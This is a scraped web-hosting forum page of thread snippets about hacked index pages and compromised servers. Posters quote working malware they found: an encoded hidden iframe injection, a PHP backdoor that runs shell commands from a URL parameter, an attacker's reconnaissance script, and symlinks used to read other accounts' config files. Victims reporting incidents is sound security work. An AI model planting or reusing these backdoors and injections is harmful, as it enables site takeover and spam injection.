Index Page Hacking

Dec 4, 2007

One of my customer's domain name's index page is hacked with the pharmacy kind of URLs all over on the homepage. Anyone has idea about this? You can see the URL at

View 3 Replies


Setting Index.html As Default Page Instead Of Index.php?

Jun 23, 2008

Have a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.

View 1 Replies View Related

How To Make A Page Your Index Page

Nov 1, 2008

after uploading my site to the host, I want to type my domain and the home appears.

At the moment, typing my domian, an generic web host index page appears.

View 13 Replies View Related

Subdomain Index Page

Aug 28, 2009

I created the subdomain for my site www.mysite/myclientpotentialdomain, with the only purpose to show my client the mock up of his home page using his potential domain name.
The file is named index.htm and consist only the mock up image.

The problem that I encountered is when I refresh the browser (Firefox) the image disappears. I can see the alt tag, but the picture is gone. Works fine in IE though.
The only difference I have noticed that after the refreshment,

View 13 Replies View Related

Index Page Not Showing

Jul 23, 2009

i have hosted my website on dadicated windows hosting with rackspace. my webiste default page was index.aspx. now i have created new home page with name the of index.html and uploaded this page to server and deleted old home page index.aspx but my new index.html page not showing when i try to open open my website but its opening when i try with

View 4 Replies View Related

Can't Change The Index Page

Jan 14, 2008

I'm working with HELM panel

I have deleted the index.htm file and uploaded another one

the first one had some images <img>, now

1. when i request the main page [url] the old index file is still appearing!

2. the images that was in the <img> tags of the old index file can't be deleted or renamed : can't be accessed at all.

View 3 Replies View Related

Index Page Viewable On Server IP

Jan 15, 2008

I am using WHMCS and need to upload an index.php per server I wish to monitor. How do I go about doing this so that I can view the page via this method


I'm using cpanel / centos

View 6 Replies View Related

How To Protect The Index Page From Hackers

Aug 3, 2008

Am suffering from a hacker every time, he changes my client’s index (index..Php).

I changed FTP log, but still, it seems doesn’t work!

My simple question: How to protect the index page from hackers?

View 4 Replies View Related

Index Page With Javascript Probably Hacked ..

Jul 15, 2008

when i oppened my site i found that there was a code in the index i don't know from what but when i earsed it it returned again ...

View 0 Replies View Related

Showing As Home Page Without Index.html

Jul 19, 2007

Is it possible to show a default page as the home page of the web site, without setting it as index.html or default.html? This is only on a shared hosting account , so the client does not have access to the apache conf or anything like that.

Here is the site. But, when I move the whole account over to my server, it doesn't show as the home page.

View 5 Replies View Related

Static Index.html Pages Hacked, Also Index Files

Sep 8, 2007

My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.

I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).

Going back on track, all files named "%index%" were hacked.

-I found a index.txt file with links to obscure sites.

The code was written at bottom of the all index.html files: iframe code

><!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#103&#111&#111&#103&#108&#101&#116&#114&#97&#102&#102&#46&#99&#111&#109&#47&#105&#110&#46&#99&#103&#105&#63&#100&#101&#102&#97&#117&#108&#116" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code

PHP Code:

<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = '';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

");$wr = 0;while(!feof($socket)){  $temp = fgets($socket);    if(eregi("<",$temp)) {      $wr = 1;        }                      if($wr) {              $page .= $temp;                }                }                fclose($socket);                                return $page;                }                                ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...

View 5 Replies View Related

301 Redirect From Index.htm Index.asp Using Limited IIS Server

Mar 6, 2007

I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.

The problem is that their old index.htm page has a pagerank of 4 which we want to keep.

And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.

The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.

My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?

JavaScript, I have heard is completely out the question

View 3 Replies View Related

Index.php Is Not Working But Index.php? Is Ok

Mar 27, 2007

I recompiled apache and php due to some problems. Now apache and php is running and I have a VB forum running fine. However, one folder has a PHP page named index.php when I type its URL I get it downloaded and it is not executed directly from the server.

when I add "?" to the end of the URL[url]" it runs with no problems!

Is it something wrong with httpd.conf or what?

View 6 Replies View Related

Apache :: Redirect Some HTM Page To WordPress Page Without Path And Query String

Jan 5, 2015

I want to permanent redirect some .html page from subdomain to main domain WordPress page,Redirect permanent /cat/FSBO76.URL....

View 1 Replies View Related

Plesk 12.x / Windows :: Subdomain (Page Not Found / Page Doesn't Exist)

Jun 21, 2014

I have a problem with my server. I am trying to make a subdomain, and it isn't working. I create it like how in all tutorials says here( click here ) . I completed all fields, but when i try to open the subdomain in a browser page, it's telling me, page not found / page doesn't exist. I have a dedicated server on window server 2008 for my website with a dedicated IP.

View 5 Replies View Related

A Lot Of Hacking

May 7, 2009

today i have a lot of hacking on my server .

i searched for shell scripts on the server , and i found alot of it :

[root@host svt]# ls -l
total 48
-rw-r--r-- 1 koky koky 6700 May 7 08:14 s.php
lrwxrwxrwx 1 koky koky 48 May 7 08:07 s1 -> /home/user1/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:12 s2 -> /home/user2/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 48 May 7 08:19 s3 -> /home/user3/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:37 s5 -> /home/user4/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 49 May 7 08:49 s6 -> /home/user5/public_html/vb/includes/config.php
-rw-r--r-- 1 koky koky 13199 May 7 07:59 ss.php
-rwxr-xr-x 1 koky koky 23005 May 7 07:58 svt.svt

as u can see he uploaded the files on this account "koky" and redirected this files to user1,user2,user3,user4 and user5 accounts .

and he could read the config.php and then hacked the site easly !!

i read befor that the reason of this is Perl on the server , and the way to solve it to edit httpd.conf by adding this in it :

<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch

and then restart the http :
service httpd restart

i did all of that , and when i restarted http it said :
[root@host www]# service httpd restart
Syntax error on line 51 of /usr/local/apache/conf/httpd.conf:
Invalid command 'Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch', perhaps misspelled or defined by a module not included in the server configuration

and all the sites got down !

i deleted :
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch

from httpd.conf and then sites worked correctly .

so you all know my problem now ! and i think alot of you have the same problem , so i wish we all try to find any solution for this and knows the best way to protect pel on the server .

View 5 Replies View Related

Stop Hacking

Feb 6, 2009

a site i manage for a client is being hacked every couple of days, its not the actual site but the hosts server thats getting attacked, all sites on that server, well actually all thier servers.

They have made no attempt to sort this problem, i report it they look at the site and say "site loads fine for us" which it does.

All index files are having a base64 encode line written after the <body> tag, this adds hundreds of spam links which are hidden with display:none; they also add .html to application types in htaccess for php to run in these files too.

Problem is, i am moving the site to another host but cannot change the nameservers to the new host's untill the client returns from a holiday, so i must keep the site up on the insecure host for now.

I am removing the spam code almost daily, is there anyway i can stop this attack happening for the time being, the host does nothing.

View 14 Replies View Related

Hypervm Hacking

Jun 8, 2009

As well all know there has been a hypervm exploit which may have taken down fsckvps and other hosts have been having attacks. If possible install any program that will warn you of a connection to your server and or provide input on what it may or may not be.

I myself Just had a blank php format file uploaded to a clients vps and It tried accessing other vps servers. As far as I know the ip was rapidly changing and untraceable (this may or may not be from the exploit), If anyone else is having hypervm attacks or server attacks please post here so instead of working within our own company's we are working as a group of over 10 thousand+ wht members to solve this issue ourselves.

(mods may move this wherever)

View 14 Replies View Related

Server Hacking...

Jan 15, 2008

i have a server and these days my server is hacking by the hacker the problem is, chmod 777, there are many dir's with the chmod 777 and hacker is uploading files and creating folders under the folder which is created with chmod 777, now i just want to know how i can block the hacker, and is there any way to allow the scripts which in my server and not allow any other scripts to upload files in my server

i have linux server

View 14 Replies View Related

Is This A Hacking Attempt

Feb 22, 2007

my referals logs that I keep on a website, I have come accross the following this morning, Is this some one who is trying to gain access to the server etc.


I have the Ip addresses that they have come from and it resolves to a Russian (I Think) website.

Im just looking through all the folders on the server now and no data has been comprimised as far as I can see and im going to use the query strings in order to block access and also deny access via ip address.

View 1 Replies View Related

MYSQL Hacking

Jun 27, 2007

alot of Databases in my server was hacked

Hacker can edit tables

Are there any any ports in MYSQL4?

View 14 Replies View Related

Forums Hacking

Jun 20, 2007

Alot of VB forums have hacking every day
In fact All hackers couldn't hack databases or files

They only edit one template in style like header or forumhome
So Uploading style again resolve the problem
But How can I disallow them to to edit templates

Any functiond to disable or rule for mod_sec ?

View 4 Replies View Related

Hacking Attempt

Sep 13, 2007

see the log entries below:

LogFormat "%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{X-Forwarded-For}i"" - -[12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//[footer]=[url]HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-" - - [12/Sep/2007:11:16:00 +0900] "GET //[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"

What can you say from the above log entries?

View 1 Replies View Related

So How Does Hacking Work

Nov 29, 2007

I keep reading all these devastating posts about people's machines being compromised. Are most of these hacks due to weak passwords of administrators or clients which end up getting bruted, or are there known exploits for cpanel/plesk/apache etc? I am setting up an apache-only server with a really secure password, but I am wondering if it could still be breached using an exploit.

View 14 Replies View Related

Is Someone Hacking My Server

Apr 25, 2007

Purely by accident I logged in a few minutes ago onto my server and ran a 'ps -ax'

At the very end I had the following lines:

29803 ? S 0:00 /bin/sh /usr/local/sbin/bfd -s
29804 ? D 0:00 /bin/sh /usr/local/bfd/tlog /var/log/secure sshd.4
29805 ? S 0:00 grep sshd
29807 ? S 0:00 grep -viw error: Bind
29808 ? S 0:00 sed s/::ffff://
29814 ? S 0:00 grep -iw Illegal user
29816 ? S 0:00 grep -iwv Failed password for illegal user
29817 ? S 0:00 grep -iwf /usr/local/bfd/pattern.auth
29818 ? S 0:00 awk {print$10":"$8}
29819 ? S 0:00 grep -E [0-9]+

Is this someone hacking my password file or is this something diffrent?

View 2 Replies View Related

Refferer's Landing Page And Source Page

Apr 15, 2007

Right now my stats system only shows from what website traffic is coming. I have google analytics aswell, and with all its functions, it does not tell me from exactly what webpage traffic is coming, and to what webpage the traffic is coming to.

So, let say someone is sending me traffic from to

My statistics would only show that is sending traffic to

Is there a way(a script/service/program) to find out exactly from what webpage the traffic is coming, and to what webpage of mine the traffic is going to?
(I do not have server logs / webalizer / awstats as my server cannot handle the log processing due to high server loads)

View 0 Replies View Related

Php Injection & Session Hacking

May 28, 2008

I had done a program in early 2006 for a site in php-mysql. At the time of doing the code, The code written was not so standard and it contained uninitialized variables used for include file paths (eventhough values are assigned to it before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.

And now i was informed that the insecure code in my program caused the server crash and i have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside the /www/ will make the sites hosted on the server where this program runs to stop/crash for ever ?

function update_region($id,$regname,$regcom)
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;


View 3 Replies View Related

Hacking Attempt On Site

Jul 20, 2008

I am having issue with my server. Someone is trying to execute some code and possibly trying mysql injection method.

I have pasted the code below.

Please suggest what can be done in this case.



The person tried to use different IPs and different websites to execute the code.




[url] >>

There are many such queries under my logs.

The person is using different IPs, so, i can't even block that many IPs.



function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";

View 5 Replies View Related

My Thoughts About Hacking... [Part 1]

Jul 8, 2008

Is security really that critical? If so, why are some of the largest software companies providing such a bad example for the rest of the industry? Why would someone want to target my website? Why is security often overlooked?

These are all common questions that arise on a daily basis within the online industry.

The rest of this article will provide some detailed answers, along with practical examples and true scenarios.

I've spoken with numerous hackers over the past short while. I can't count the number of times I've heard the line "Ignorant site owners deserve to be hacked". In my opinion, that's like claiming that cars without alarms deserve to be stolen, or homes without alarm systems deserve to be burglarized. It's not just wrong - it's illegal.

Security risks and vulnerabilities affect the entire online industry. When a single website is hacked, there are usually multiple other victims. This is most commonly seen with widely distributed software. A potential attacker has the ability to install the software on a test environment, locate the vulnerabilities, then attack random victims even before anyone else is aware of the potential exploits. Once a vulnerability is located, the attacker simply needs to search for other environments using the same software, and within minutes there are hundreds, often thousands of potential victims.

Typically, in the race to market, software providers are encouraged to release their products as soon as the applications are usable. Critical development procedures are often overlooked or intentionally bypassed. One such miss is an application vulnerability assessment. Although the product may be usable, the effects of a vulnerable application could be severe.

Sadly, nobody is "off limits" when it comes to hacking. Most hackers feel safe committing online crime, since the online industry has evolved much faster than the security industry. Many applications are not created with the intent to recognize hacking attempts. Some hackers view their actions as a competition - Who can attack the most valuable website? Who can exploit the most user databases? In many cases, these attacks are bragged about within the hacker's immediate network. The competitive nature of these hacking groups has become so severe, there have been reports of attacks between competing organizations.

You might ask, "If I use industry standards, won't my environment be secure?". The short answer: no, but it helps. Hackers are not restricted by industry standards. Most security companies only implement new standards once at least one victim is reported. This often gives hackers plenty of time to locate other vulnerable environments, and before long, the number of victims can increase rapidly. Hackers are some of the most innovative individuals within the online industry. The most logical way to combat them is to use similar methodology for security purposes.

View 2 Replies View Related

My Vbulletin Forum Hacking

May 30, 2007

that my vbulletin forum redirect to another site

i upgrade to last version but i still have the same error

i have root access and want to know how i can restrict direct to another server

View 2 Replies View Related

Daily Hacking Attempts

Oct 13, 2007

Our VPS is being hit several times a day with hacking attempts. We have been actively monitoring error logs and can see the failed attempts. I was just wondering if there is a better way to track such attempts or another system log that wold provide additional info on these attacks? or maybe some 3rd party logging scripts?

View 13 Replies View Related

Copyrights 2005-15, All rights reserved